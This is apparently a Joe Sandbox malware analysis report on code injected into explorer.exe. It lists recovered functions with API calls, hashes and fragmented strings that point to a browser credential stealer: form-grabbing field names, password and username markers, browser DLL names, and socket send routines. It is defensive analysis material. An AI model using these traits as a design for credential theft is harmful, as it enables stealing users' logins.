Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction ID: 8408bbead53c31db0e9f1c86a0b10b59258da86fcf51e7b217f1496ac2e37b37
Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
Instruction Fuzzy Hash: 6C527F30618B088BEB69FF68C8847E9B7E1FB54300F54462ED49FDB186EE34A545CB85

Function 0F004232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL ref: 0F004449

Strings

`, xrefs: 0F00441D

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: CreateFile
String ID: `
API String ID: 823142352-2679148245
Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction ID: 867550aca778260230ed74bc7e89889778c90641bb6d2d2a5b75672c4b1172d2
Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
Instruction Fuzzy Hash: 8A226F74A18B099FDB99EF28C4947ADF7E1FB98301F80022EE55ED7291DB30A451CB85

Function 0F005E12 Relevance: 1.6, APIs: 1, Instructions: 59
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0F005E67

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction ID: 9aeaa220fddc53a2dab6fea66dfd4c532f06a12c0311c7365813960fd3a16ef6
Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
Instruction Fuzzy Hash: 03019E34628B884F9B88EF6CD48022AB7E4FBCD214F000B3EA99AC3250EB64C5414B42

Function 0F005E0A Relevance: 1.6, APIs: 1, Instructions: 52
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL ref: 0F005E67

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction ID: 0a66c17933529aefc8bc4d69bcbf8acc616edfb3751deec87e7fae939de42141
Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
Instruction Fuzzy Hash: 5501A734628B884B9748EB3C94412A6B3E5FBCE314F000B7EE9DAC3241DB25D5024782

Function 0EFFF8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0EFFF9A0

Strings

User-Agent: , xrefs: 0EFFF935, 0EFFF948
nt: , xrefs: 0EFFF91E
on.d, xrefs: 0EFFF902
urlmon.dll, xrefs: 0EFFF959

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: 64db2468a5f6fca71eddbdbc532ccc07d1c2386b0d0490cc249be235b4a92e9c
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 9731D131614B0C8BDB14FFA8C8987EEB7E1FF58204F44022AD54ED7291DE788645C789

Function 0EFFF8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ObtainUserAgentString.URLMON ref: 0EFFF9A0

Strings

User-Agent: , xrefs: 0EFFF935, 0EFFF948
nt: , xrefs: 0EFFF91E
on.d, xrefs: 0EFFF902
urlmon.dll, xrefs: 0EFFF959

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: AgentObtainStringUser
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 2681117516-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: b4dfb9f145f5b77c583944c1d2e1bcdd0b60f024a6d0e894448369f3d9011535
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: 0B21D531A14B0C8BDB14FFA8C8587EE7BE1FF58204F44422AD55AD7291DF788605CB89

Function 0EFFBB66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExW.KERNEL32 ref: 0EFFBCCA

Strings

el32, xrefs: 0EFFBBA0
.dll, xrefs: 0EFFBBCD
kern, xrefs: 0EFFBB99

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction ID: 9561189ba9fe3850b53ab32f688b5f65b8a516cf9ac097f3529c81ea5e79d2b7
Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
Instruction Fuzzy Hash: 3E418D70918A08CFDB54EFA8C8987ED77E0FF98300F00417AD94ADB266EE349945CB85

Function 0EFFBB72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateMutexExW.KERNEL32 ref: 0EFFBCCA

Strings

el32, xrefs: 0EFFBBA0
.dll, xrefs: 0EFFBBCD
kern, xrefs: 0EFFBB99

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: CreateMutex
String ID: .dll$el32$kern
API String ID: 1964310414-1222553051
Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction ID: 88b74770414e564d4daed973454901919eed89476d14f0e2d0e567c595b446ce
Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
Instruction Fuzzy Hash: 5C413C74918A088FDB44EFA8C498BED77E1FF58300F04417AD94ADB256DE349945CB85

Function 0F00172E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0F001791

Strings

conn, xrefs: 0F00175A
ect, xrefs: 0F001761

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction ID: 9bf39383080cd17c099d7baba197163854b774cc3f79b05d8fb80df1c8bb51ec
Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
Instruction Fuzzy Hash: 67015E30618B188FCB94EF1CE088B55B7E0FB58314F1545AEE90DCB266CA74D8818BC2

Function 0F001732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

connect.WS2_32 ref: 0F001791

Strings

conn, xrefs: 0F00175A
ect, xrefs: 0F001761

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: connect
String ID: conn$ect
API String ID: 1959786783-716201944
Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction ID: 2160b624ba85c141bd7c89e29a32f65f24c78b014d88a4e1b65df4af3c3a664b
Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
Instruction Fuzzy Hash: 2B012C70618A1C8FCB94EF5CE088B55B7E0FB59314F1541AEA90DCB266CA74C9818BC2

Function 0F0016B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

send.WS2_32 ref: 0F001713

Strings

send, xrefs: 0F0016DA

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: send
String ID: send
API String ID: 2809346765-2809346765
Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction ID: 54c3c5ec9c36625c6a7e584e00e9367bed9f397bf39665be9e1661afd1566e7a
Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
Instruction Fuzzy Hash: 28011270518A188FDBC4EF1CD048B2577E0EB58315F1545AED95DCB266C670D8818B85

Function 0F0015B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

socket.WS2_32 ref: 0F001611

Strings

sock, xrefs: 0F0015D9

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: socket
String ID: sock
API String ID: 98920635-2415254727
Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction ID: c1ceebbc8cb74b343f831ddd6a9487f0dffa4a4a25db4bd7bcbafae7b0069374
Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
Instruction Fuzzy Hash: 59017C30618B188FCB84EF1CE048B50BBE0FB59314F1545AEE80ECB266C7B0C9818B86

Function 0EFF92DD Relevance: 1.6, APIs: 1, Instructions: 91
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SleepEx.KERNEL32 ref: 0EFF932D

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction ID: 10e8b56569ba6081a6672cefeefc7cebc59bb58e936ec923056d1dc87b2ceb74
Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
Instruction Fuzzy Hash: 37318E70A14B09DADB64EFA980A83E5B3A0FF84300F44467FCA1DC7166CBB49850CF91

Function 0EFF9412 Relevance: 1.5, APIs: 1, Instructions: 46
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateThread.KERNEL32 ref: 0EFF9461

Memory Dump Source

Source File: 00000006.00000002.4551128208.000000000EF90000.00000040.80000000.00040000.00000000.sdmp, Offset: 0EF90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ef90000_explorer.jbxd

Similarity

API ID: CreateThread
String ID:
API String ID: 2422867632-0
Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction ID: dfb90b5456320ab2aafa27aadfd5f0e7c8e273bddd008cb8b7cb103e715acda1
Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
Instruction Fuzzy Hash: 16F0C230668B484FEB88EB2CD44567AB3D0EBE8214F44463EAA4DC3265DA69C5824716

Non-executed Functions

Function 0F9DFD02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON

Download Yara Rule

Strings

dll, xrefs: 0F9DFF4C
32.d, xrefs: 0F9DFF0B
wini, xrefs: 0F9DFF72
S, xrefs: 0F9E0073
.dll, xrefs: 0F9DFF2F
kern, xrefs: 0F9DFF5A
ll, xrefs: 0F9DFF13
user, xrefs: 0F9DFF03
el32, xrefs: 0F9DFF27
net., xrefs: 0F9DFF44
M, xrefs: 0F9E0082

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
API String ID: 0-393284711
Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction ID: 21cb65c928a2c365979b023611167957acb171c9bae856e7214da9682144826a
Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
Instruction Fuzzy Hash: 2EE16B70518F488FC765EF68C4847AAB7E0FB98301F504A2E959FC7292DF34A545CB89

Function 0F9E2792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON

Download Yara Rule

Strings

encr, xrefs: 0F9E28D2
form, xrefs: 0F9E284D
Subm, xrefs: 0F9E2855
guid, xrefs: 0F9E27CE
dUse, xrefs: 0F9E28AD
d, xrefs: 0F9E28F2
name, xrefs: 0F9E287D
user, xrefs: 0F9E2876
Fiel, xrefs: 0F9E2884
itUR, xrefs: 0F9E285D
swor, xrefs: 0F9E28EA
e, xrefs: 0F9E28BD
encr, xrefs: 0F9E289D
rnam, xrefs: 0F9E28B5
dPas, xrefs: 0F9E28E2
ypte, xrefs: 0F9E28DA
ypte, xrefs: 0F9E28A5

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
API String ID: 0-2916316912
Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction ID: 649d4f3da25b61696cbbb5aa013070136dae37e0b9d8fa9a3899a5e88ef8f046
Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
Instruction Fuzzy Hash: 0EB17C30518B488EDB55EF68C485AEEB7F1FF98300F50491ED49AC72A2EF749505CB86

Function 0F9E0622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON

Download Yara Rule

Strings

w, xrefs: 0F9E06B3
2, xrefs: 0F9E0674
u, xrefs: 0F9E0661
n, xrefs: 0F9E06C1
l, xrefs: 0F9E06D6
l, xrefs: 0F9E0682
n, xrefs: 0F9E06BA
p, xrefs: 0F9E0690
t, xrefs: 0F9E06C8
d, xrefs: 0F9E06A5
c, xrefs: 0F9E0697
d, xrefs: 0F9E067B
i, xrefs: 0F9E069E
s, xrefs: 0F9E0689
e, xrefs: 0F9E066D
l, xrefs: 0F9E06AC
d, xrefs: 0F9E06CF

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
API String ID: 0-1539916866
Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction ID: b5af10472b5eb96a4ccaf8712c13cd0ac4e01e19a3aeeb5184b87b3eb04f4fc9
Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
Instruction Fuzzy Hash: 0841B170A18B088FDB14DF88A8456BD7BE6FB88700F40025ED409D3396DBB5AD458BD6

Function 0F9E7AB2 Relevance: 17.8, Strings: 14, Instructions: 339COMMON

Download Yara Rule

Strings

], xrefs: 0F9E7CA8
], xrefs: 0F9E7C3D
l, xrefs: 0F9E7C35
[, xrefs: 0F9E7C90
D, xrefs: 0F9E7CDA
[, xrefs: 0F9E7CCD
l, xrefs: 0F9E7CE2
[, xrefs: 0F9E7BF6
b, xrefs: 0F9E7C73
[, xrefs: 0F9E7C2D
c, xrefs: 0F9E7C0B
e, xrefs: 0F9E7CA0
n, xrefs: 0F9E7C98
[, xrefs: 0F9E7C66

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
API String ID: 0-355182820
Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction ID: 3783c608278c817755ba40014dac05d959af88c71c14c3988776ed8e26802b48
Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
Instruction Fuzzy Hash: 7DC19C30618B088FC75AEF68C485AEAF3E5FB94304F40472E959EC7252DF34A515CB86

Function 0F9E7F12 Relevance: 15.2, Strings: 12, Instructions: 201COMMON

Download Yara Rule

Strings

r, xrefs: 0F9E7FC0
c, xrefs: 0F9E7FC8
n, xrefs: 0F9E7F6B
r, xrefs: 0F9E7FA0
r, xrefs: 0F9E7FB0
r, xrefs: 0F9E7F98
r, xrefs: 0F9E7FB8
0, xrefs: 0F9E7F5B
r, xrefs: 0F9E7F90
r, xrefs: 0F9E7F88
r, xrefs: 0F9E7FA8
., xrefs: 0F9E7F63

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: .$0$c$n$r$r$r$r$r$r$r$r
API String ID: 0-97273177
Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction ID: 246bdfb6db15b7f0b98b061ea1fcd88d71874d154ffb1141f221e080fac3ffa7
Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
Instruction Fuzzy Hash: DD51B2315187488FD71ADF58D8812AAB7E5FBC5700F501A2EE8CBC7282DBB49546CB82

Function 0F9E12F4 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

opera_browser.dll, xrefs: 0F9E1629
cli., xrefs: 0F9E1327
sspi, xrefs: 0F9E1320
nspr, xrefs: 0F9E14D4
l, xrefs: 0F9E14E2
4.dl, xrefs: 0F9E14DB
dragon_s.dll, xrefs: 0F9E1614
dll, xrefs: 0F9E132E

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction ID: 0e3d10c549a39cd256396b99478781461282f7ce3ef8f885b0038395899d474e
Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
Instruction Fuzzy Hash: 54C1A070618B194FC759EB68C495AEAF3E5FB98300F944329940AC7292DF34EA458B86

Function 0F9E12F2 Relevance: 10.4, Strings: 8, Instructions: 380COMMON

Download Yara Rule

Strings

opera_browser.dll, xrefs: 0F9E1629
cli., xrefs: 0F9E1327
sspi, xrefs: 0F9E1320
nspr, xrefs: 0F9E14D4
l, xrefs: 0F9E14E2
4.dl, xrefs: 0F9E14DB
dragon_s.dll, xrefs: 0F9E1614
dll, xrefs: 0F9E132E

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: e60ae503b4c0d63416a4ceff4a0c491730cc14b6d150c97f8d3d87f78797712d
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: F3C1AF70618B194FC759EF68C495AEAF3E5FB98300F944329940EC7292DF34EA458B86

Function 0F9E2CD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

name, xrefs: 0F9E2DB2
L: , xrefs: 0F9E2D66
UR, xrefs: 0F9E2D5F
word, xrefs: 0F9E2D9E
2, xrefs: 0F9E2DE1
Pass, xrefs: 0F9E2D97
User, xrefs: 0F9E2DAB

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: 3320df95cff756454f915678fd7fbb1359f37cfa048287297503e2dcf934ba06
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 11A1D330A187488FDB29EFA8D444BEEB7E5FF98300F40462DD48AD7292EF3495458B85

Function 0F9E2CE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

name, xrefs: 0F9E2DB2
L: , xrefs: 0F9E2D66
UR, xrefs: 0F9E2D5F
word, xrefs: 0F9E2D9E
2, xrefs: 0F9E2DE1
Pass, xrefs: 0F9E2D97
User, xrefs: 0F9E2DAB

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: 8d17d4f48b289841ae466db46c82eb22062a31f1594b8866ea56a025c72daafd
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 7291C030A187488FDB29EFA8D444BEEB7E5FF98300F40462DD48AD7292EF7495458B85

Function 0F9E2352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

., xrefs: 0F9E23B0
n, xrefs: 0F9E23E7
e, xrefs: 0F9E248E
v, xrefs: 0F9E24A0
, xrefs: 0F9E247C

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 0b209ef10bd39f4b8cb00b2475629ce0134420f915583b278a50886f7113b46f
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 0671B731A18B498FD759EFA8C4847AAB7F5FF98304F00062ED44AC7262EF75D9458B81

Function 0F9DDC32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

2.dl, xrefs: 0F9DDC64
dll, xrefs: 0F9DDC9E
ole3, xrefs: 0F9DDC5D
shel, xrefs: 0F9DDC90
l32., xrefs: 0F9DDC97

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 1afc90f8ea3b5095690a5e0d3d4c18d8a62d976574e964be7a25fd0b35f3f221
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: 4E517DB0918B4C8FDB55EFA4C044AEEB7F1FF68300F40462EA59AE7255EF3095448B89

Function 0F9DE86F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

\, xrefs: 0F9DE9E0
ion., xrefs: 0F9DE8EC
dll, xrefs: 0F9DE8F4
vers, xrefs: 0F9DE8E4
4, xrefs: 0F9DE9E9

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 2be03b46b518aa0157ca78de1ace27ca131f6a50d71ab77a9c4545fc7f7e323c
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: A2417030618B498FDBB9EF6498457EA73E4FB98301F50462E994ECB282EF30D545C782

Function 0F9E04B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

user, xrefs: 0F9E04D3
32.d, xrefs: 0F9E04DA
cli., xrefs: 0F9E0515
sspi, xrefs: 0F9E050E
dll, xrefs: 0F9E051C

Memory Dump Source

Source File: 00000006.00000002.4551708286.000000000F910000.00000040.00000001.00040000.00000000.sdmp, Offset: 0F910000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_f910000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: d9e38580fbb32bbe31e65477766ea9e44b31664fa08b3d86c2e74122eca094a1
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: 49417130A18F0DCFCB59EF6980947AD77E5FBA8300F50056A980ED7292DEB5D5818B86

Function 0F9DE432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

kern, xrefs: 0F9DE52A
h, xrefs: 0F9DE51F
el32, xrefs: 0F9DE537
.dll, xrefs: 0F9DE53F

Memory Dump Source

